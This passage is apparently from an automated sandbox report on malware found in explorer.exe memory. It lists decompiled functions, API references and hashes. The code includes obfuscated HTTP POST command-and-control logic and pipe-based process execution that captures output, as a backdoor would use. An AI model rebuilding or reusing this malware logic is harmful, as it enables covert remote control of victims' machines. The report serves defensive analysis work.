				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000895A8(0x85b);
				_v60 = E000895A8(0xdc9);
				_v56 = E000895A8(0x65d);
				_v52 = E000895A8(0xdd3);
				_t105 = E000895A8(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0008C3BB(_t214));
				_t113 =  *0x9e6a4; // 0x14dfe60
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x9e6a4; // 0x14dfe60
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x9e6a4; // 0x14dfe60
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x9e6a4; // 0x14dfe60
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x9e6a4; // 0x14dfe60
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x9e6a4; // 0x14dfe60
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x9e6a4; // 0x14dfe60
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E000897ED(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x9e6a4; // 0x14dfe60
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E000897ED(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000895A8(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x9e6a4; // 0x14dfe60
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C3BB(_t217), _a4, _a8);
										E000885A3( &_v12);
										if(_a24 != 0) {
											E000897ED(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x9e6a4; // 0x14dfe60
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E0008972A( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x9e6a4; // 0x14dfe60
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x9e6a4; // 0x14dfe60
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x9e6a4; // 0x14dfe60
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x9e6a4; // 0x14dfe60
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x9e6a4; // 0x14dfe60
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x9e6a4; // 0x14dfe60
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x9e6a4; // 0x14dfe60
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x9e6a4; // 0x14dfe60
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x0008e6b3
0x0008e6c5
0x0008e6ce
0x0008e6d8
0x0008e6dc
0x0008e6ed
0x0008e704
0x0008e711
0x0008e71e
0x0008e72b
0x0008e72e
0x0008e733
0x0008e738
0x0008e73a
0x0008e742
0x0008e74d
0x0008e754
0x0008e760
0x0008e763
0x0008e771
0x0008e774
0x0008e77a
0x0008e77b
0x0008e77d
0x0008e786
0x0008e787
0x0008e78c
0x0008e792
0x0008e79c
0x0008e79e
0x0008e7a3
0x0008e7a3
0x0008e7b2
0x0008e7c1
0x0008e7c5
0x0008e7d4
0x0008e7d7
0x0008e7dc
0x0008e7e0
0x0008e7e7
0x0008e7ee
0x0008e7f6
0x0008e7fe
0x0008e805
0x0008e80d
0x0008e815
0x0008e81c
0x0008e824
0x0008e82c
0x0008e841
0x0008e84e
0x0008e850
0x0008e855
0x0008e855
0x0008e85c
0x0008e86d
0x0008e872
0x0008e874
0x0008e874
0x0008e888
0x0008e89a
0x0008e89c
0x0008e89f
0x0008e8a4
0x0008e8a4
0x0008e8ab
0x0008e8ba
0x0008e8be
0x0008e8fc
0x0008e901
0x0008e909
0x0008e90e
0x0008e919
0x0008e91f
0x0008e929
0x0008e92c
0x0008e935
0x0008e93a
0x0008e93a
0x0008e943
0x0008e98c
0x0008e98e
0x0008e995
0x0008e996
0x0008e999
0x0008e99f
0x0008e9a3
0x0008e9a4
0x0008e9a9
0x0008e9ab
0x0008e9b1
0x0008e9c6
0x0008e9ce
0x0008ea03
0x0008ea08
0x0008ea0d
0x00000000
0x0008ea0f
0x0008e9d0
0x0008e9d2
0x0008e9d2
0x0008e9db
0x0008e9de
0x0008e9e0
0x0008e9e2
0x0008e9e8
0x0008e9e8
0x0008e9ed
0x0008e9ef
0x0008e9f6
0x0008e9f6
0x00000000
0x0008e9f9
0x0008e9b3
0x0008e9bb
0x00000000
0x0008e945
0x0008e945
0x0008e94b
0x0008e951
0x0008e954
0x00000000
0x0008e954
0x0008e943
0x0008e8c0
0x0008e8c6
0x0008e8ca
0x0008e8cb
0x0008e8d0
0x0008e8d2
0x0008e8d8
0x0008e8f6
0x0008e8f6
0x00000000
0x0008e8f6
0x0008e8da
0x0008e8e4
0x0008e8e6
0x0008e8e7
0x0008e8ec
0x0008e8ee
0x0008e8f4
0x00000000
0x00000000
0x00000000
0x0008e8ad
0x0008e8ad
0x0008e956
0x0008e956
0x0008e95c
0x0008e95f
0x00000000
0x0008e95f
0x0008e85e
0x0008e85e
0x0008e961
0x0008e961
0x0008e967
0x0008e96a
0x00000000
0x0008e96a
0x0008e85c
0x0008e7c7
0x0008e96c
0x0008e96f
0x0008e971
0x0008e974
0x0008e977
0x0008e980
0x0008e985
0x00000000
0x00000000
0x0008e989
0x00000000
0x0008e989
0x0008e796
0x00000000

APIs

memset.MSVCRT ref: 0008E6DC
memset.MSVCRT ref: 0008E6ED
memset.MSVCRT ref: 0008E742
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0008E7C7

Strings

POST, xrefs: 0008E88D

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: bcc3e27f44aff163cdf6aa850cce91d67c5c3682975e9bd2ec9b9850afe413d2
Instruction ID: 29d0154718d895a48c92b36f026742f62314de024879df0f02f683bed0031956
Opcode Fuzzy Hash: bcc3e27f44aff163cdf6aa850cce91d67c5c3682975e9bd2ec9b9850afe413d2
Instruction Fuzzy Hash: 84B15C71900218AFEB54EFA4DC89AEE7BB8BF58310F10406AF545E72A1DB749E40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000902EA, Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 0009036A
qsort.MSVCRT ref: 000905E8

Strings

, xrefs: 000905E5
true, xrefs: 00090341
false, xrefs: 0009034D
null, xrefs: 0009032F
%I64d, xrefs: 0009035C
, xrefs: 000902F8, 000906CF, 000906D9, 000905BA, 00090549, 000904D7, 00090354, 00090384, 00090398, 00090399, 000903BB, 000903C3, 000903DB, 000903EB, 00090477, 0009050A, 00090522, 00090599, 000905BF, 000905C5, 000905C6, 0009060A, 000906D2, 000906D3

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true$$
API String ID: 756996078-3248215655
Opcode ID: 4a206477d0ade5e916c7d82e72087fac9d090124020821ef9d5af1ff13053305
Instruction ID: ebb5a5c62ca3dcce896a42093dc0e8649a3f910e3309fa835c03ab8f887ca20d
Opcode Fuzzy Hash: 4a206477d0ade5e916c7d82e72087fac9d090124020821ef9d5af1ff13053305
Instruction Fuzzy Hash: E3E18171A0020ABFDF11AF64CC46EEF3BADEF55340F108029FE5596152E731DA61ABA4

Uniqueness

Uniqueness Score: -1.00%

Function 0009215A, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0009215A(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L000922BD();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L00092305();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E000886E7(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t12 = _t40 + 3;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x0009215d
0x00092162
0x00092166
0x00092166
0x0009216b
0x00092170
0x00092171
0x00092174
0x00092175
0x0009217a
0x0009217d
0x0009217e
0x00092183
0x0009218a
0x00092230
0x00092230
0x00000000
0x00092199
0x00092199
0x000921a0
0x000921a4
0x000921ab
0x000921b4
0x000921b6
0x000921b6
0x000921b4
0x000921c5
0x000921eb
0x000921f4
0x000921f6
0x000921fc
0x0009222b
0x0009222b
0x00092233
0x00092236
0x00092236
0x000921fe
0x000921ff
0x00092205
0x00092207
0x00092207
0x0009220c
0x0009220b
0x0009220b
0x00092213
0x0009221f
0x00092229
0x00092229
0x00000000
0x000921d5
0x000921d5
0x000921db
0x00000000
0x00000000
0x000921dd
0x000921e3
0x000921e8
0x00000000
0x000921e8
0x000921c5

APIs

_snprintf.MSVCRT ref: 0009217E
localeconv.MSVCRT ref: 00092199
strchr.MSVCRT ref: 000921AB
strchr.MSVCRT ref: 000921BC
strchr.MSVCRT ref: 000921CA
strchr.MSVCRT ref: 000921EF

Strings

%.*g, xrefs: 00092175
, xrefs: 0009216F, 00092170, 000921EB

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g$
API String ID: 1910550357-811258474
Opcode ID: 7664915f9979d19fbe91d7157e52710d74d6d47ab21c2b303f846be776087aa4
Instruction ID: 48dffbfe29af58806f7e26389f2570971aa095f3053ecab5a2df4101b6395fc7
Opcode Fuzzy Hash: 7664915f9979d19fbe91d7157e52710d74d6d47ab21c2b303f846be776087aa4
Instruction Fuzzy Hash: 732167762847017ADF259B68EC86BEB37DCEF16720F150015FA408A283EA75ED50B3A0

Uniqueness

Uniqueness Score: -1.00%

Function 000916F0, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E000916F0(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x000916f9
0x00091700
0x00091709
0x0009170d
0x00091788
0x00000000
0x0009178a
0x0009171b
0x0009171d
0x00091722
0x00000000
0x00000000
0x0009172a
0x0009172c
0x00091731
0x00000000
0x00000000
0x0009173b
0x0009173f
0x00000000
0x00000000
0x00091741
0x00091746
0x00091748
0x00091749
0x0009174d
0x00091753
0x00000000
0x00000000
0x0009175e
0x00091767
0x0009176b
0x00000000
0x00000000
0x0009176d
0x0009176f
0x00091777
0x00091779
0x0009177a
0x00091782
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008763B,?,?,00000000,?), ref: 00091703
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 0009171B
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 0009172A
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091739

Strings

CryptReleaseContext, xrefs: 00091733
advapi32.dll, xrefs: 000916FB
CryptGenRandom, xrefs: 00091724
CryptAcquireContextA, xrefs: 00091715

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 655cf0b23e1451d570487c5493d98a1b0c0b12902124c8b0dedc83f08aadfb10
Instruction ID: 7fdc4f0f6aaa44df7a4b36d05e84f53a5a1be7caad4b7dfd5aeac40d407615ad
Opcode Fuzzy Hash: 655cf0b23e1451d570487c5493d98a1b0c0b12902124c8b0dedc83f08aadfb10
Instruction Fuzzy Hash: C7117735B046177BDF615BE98CC8DEEBBFDAF45741F1400A5EA11E6240DA70CD01A764

Uniqueness

Uniqueness Score: -1.00%

Function 0008D78A, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 0008D79E
SysAllocString.OLEAUT32(?), ref: 0008D7A6
SysAllocString.OLEAUT32(00000000), ref: 0008D7BA
SysFreeString.OLEAUT32(?), ref: 0008D835
SysFreeString.OLEAUT32(?), ref: 0008D838
SysFreeString.OLEAUT32(?), ref: 0008D83D

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
Instruction ID: 204230854e776adb52a2a1a5bf40ee50c1139d69a1c7b266b95cca093d954732
Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
Instruction Fuzzy Hash: BF21F775A00218EFDB10EFA5CC88DAFBBBDFF48354B10449AF505A7251DA70AE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0009082F, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X\u%04X, xrefs: 00090988
\u%04X, xrefs: 00090949
, xrefs: 0009082F, 00090836

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: \u%04X$\u%04X\u%04X$
API String ID: 0-223117982
Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
Instruction ID: a930ef95356e53a95952b9cc4321f5d0d219051c23132d0a069292d46551cfe3
Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
Instruction Fuzzy Hash: 6041B571700305AFFF789A589D9ABBF3AA8DF01710F140025FA82D6393D665CD91B6D1

Uniqueness

Uniqueness Score: -1.00%

Function 0008D565, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E0008D565(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E000885E5(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x0008d572
0x0008d575
0x0008d578
0x0008d589
0x0008d58f
0x0008d5a0
0x0008d5a8
0x0008d5f9
0x0008d5f9
0x0008d5fe
0x0008d603
0x0008d603
0x0008d606
0x0008d60b
0x0008d610
0x0008d610
0x0008d613
0x0008d5aa
0x0008d5ab
0x0008d5b1
0x0008d5c2
0x0008d5c7
0x00000000
0x0008d5c9
0x0008d5d6
0x0008d5de
0x00000000
0x0008d5e0
0x0008d5e2
0x0008d5ea
0x00000000
0x0008d5ec
0x0008d5ef
0x0008d5f5
0x0008d5f5
0x0008d5ea
0x0008d5de
0x0008d5c7
0x0008d618

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 0008D578
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D589
CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D5A0
SysAllocString.OLEAUT32(00000000), ref: 0008D5AB
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D5D6

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 241812e9e5a7d03e5be1123172081bd285c6d6d6a96c6a5d35f911ae47af3928
Instruction ID: c82542db590a0233d1c1274d0889e5be0d465def93cc6adf2a6bd8fc249cdf5a
Opcode Fuzzy Hash: 241812e9e5a7d03e5be1123172081bd285c6d6d6a96c6a5d35f911ae47af3928
Instruction Fuzzy Hash: 0521F570600245BBEB249BA6DC4DE5BBFBCFFC6B15F10415EB501AA2A0DA709A01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00092237, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00092237(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L00092305();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L000922C9();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x98250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L000922C9();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x98258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x00092237
0x0009223f
0x00092244
0x00092247
0x0009224c
0x00092252
0x0009225b
0x0009225f
0x0009225f
0x0009225b
0x00092261
0x00092266
0x0009226f
0x00092274
0x00092277
0x00092280
0x00092282
0x00092289
0x0009229a
0x0009229a
0x0009229c
0x000922a4
0x000922ab
0x00000000
0x000922a6
0x000922aa
0x000922aa
0x0009228b
0x0009228b
0x00092291
0x00092293
0x00092298
0x000922ae
0x000922b1
0x000922b6
0x00000000
0x00000000
0x00000000
0x00092298

APIs

localeconv.MSVCRT ref: 0009223F
strchr.MSVCRT ref: 00092252
_errno.MSVCRT ref: 00092261
strtod.MSVCRT ref: 0009226F
_errno.MSVCRT ref: 0009229C

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
Instruction ID: 63d42227c90a01ef9405b7e132d6f5d7d59320d0a91bfa312613f1a0accb1f9e
Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
Instruction Fuzzy Hash: B601F235904205BBDF126F28E9017DD7BA4AF4B360F2142D1E980772E2DF759954E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0008A9F9, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0008A9F9(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E000885FB( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x9e684; // 0x14df8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x9e684; // 0x14df8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E000885E5(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x9e684; // 0x14df8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x9e684; // 0x14df8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x9e684; // 0x14df8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x9e684; // 0x14df8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E00089187(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00089273(_t127);
						E000885FB( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E0008C3BB(_t127));
				_t98 =  *0x9e68c; // 0x14dfab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x9e684; // 0x14df8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x9e684; // 0x14df8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00089237(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E000885FB( &_v32, 0);
				return _t128;
			}

0x0008aa04
0x0008aa06
0x0008aa12
0x0008aa17
0x0008aa1a
